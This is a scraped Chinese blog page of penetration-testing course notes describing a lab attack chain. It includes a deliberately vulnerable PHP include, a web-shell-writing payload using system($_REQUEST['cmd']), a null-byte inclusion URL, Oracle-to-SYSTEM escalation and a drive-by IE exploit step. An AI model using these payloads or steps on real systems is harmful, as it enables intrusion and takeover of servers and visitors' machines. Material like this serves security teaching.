渗透课程笔记
来源:互联网 发布:mysql 最小值 编辑:程序博客网 时间:2024/05/01 08:23
由于仅仅是听课笔记,错漏均会有,原理是正确的
1.环境
主机1 192.168.0.1011)win2003操作系统
2)开启apache+mysql+php+wordpress
其中 apache以低权限用户webmaster运行,使用端口80
wordpress暴露漏洞形式如下
XXX.php
$path_array = array(
"xxxpath" => "../../"
...
);
$postValue = $_POST;
$tmpArray = array_merge($path_array,$_POST);
include_once($tmpArray["xxxpath"]."YYY.php");
3)开启jboss+oracle
其中jboss以webmaster权限运行,使用端口1003
oracle以默认的system权限运行
4)防火墙开启,仅仅允许80,1003
主机2 192.168.0.102
1)win8 操作系统
2)ie低版本
3)脚本命令ie不断访问 192.168.0.101 首页
4)防火墙开启,仅仅允许80端口
攻击机 192.168.0.103
2.渗透过程
主机1
1)wordpress漏洞->apache web->low privilege
2)jboss->oracle->oracle dba->system privilege
主机2
3)apache web index.html->挂马->ie低版本漏洞->主机2
3.具体过程
1)上传cmd.txt文本,其内容为一个web shell形式如下
<?php
$contents ="<?php \n system($_REQUEST[\"cmd\"]); \n?>"; #记得不太清,大致是这个意思
file_put_contents("control.php",$contents); ###目的就是制作一个控制脚本到服务器上
?>
2)构造链接
XXX.php?xxxpath="xxx/cmd.txt%00"
从而使得
XXX.php中产生 include_once("xxx/cmd.txt%00"."YYY.php"); ##这导致%00后面的东西被截断,而cmd.txt被执行,从而生成control.php到服务器端
此时已取得webmaster的权限,可以用菜刀等软件直接操作webmaster的各项权限
3)由于有webmaster 权限,此时可以查看jboss链接oracle的账号密码,即可得到oracle的低级权限
4)通过oracle的尚未被去掉的提权接口,升级为oracle dba
5)将用户切换为oracle dba 此时可以书写 java 存储过程,此存储过程是system权限,此时实际已经得到系统的超级用户权限
6)可以书写java存储过程添加win2003系统管理员用户
7)在主机1的 index.php 中挂马,针对早期ie的缓冲区溢出
8)主机2访问index.php导致ie中的缓冲区溢出执行给定的下载木马并执行
- 渗透课程笔记
- 渗透笔记
- 落泪红尘渗透笔记
- 【渗透笔记】陆
- 渗透测试学习笔记
- 个人渗透笔记
- 个人渗透笔记
- metasploit渗透测试笔记
- [笔记]渗透测试基础
- 课程笔记
- 课程笔记
- 渗透技巧笔记 - 落泪红尘
- 渗透笔记-常用入侵步骤
- wifi渗透流程整理笔记
- 安全渗透测试笔记---------------前言
- metasploit渗透测试笔记(内网渗透篇)
- metasploit渗透测试笔记(内网渗透篇)
- metasploit渗透测试笔记(内网渗透篇)
- 【Oracle】-【体系结构-LGWR】-LGWR的一些理解
- 百度自定义地图控件
- Struts2中field级别错误导致action无法使用的问题
- NOJ 212题K尾相等数
- TortoiseSVN 打开出现“系统找不到指定的路径”
- 渗透课程笔记
- Win 7重装小记
- java中提高时间性能的一些措施
- [小说]魔王冢(13)吕四娘
- hdu3460(字典树)
- gdb调试汇编
- Linux怎样查看所有用户以及用户(组)的添加 删除
- [唐胡璐]VBS - Pad Number String with Zeroes(在字符串左侧补0
- Dijkstra 算法求最短路径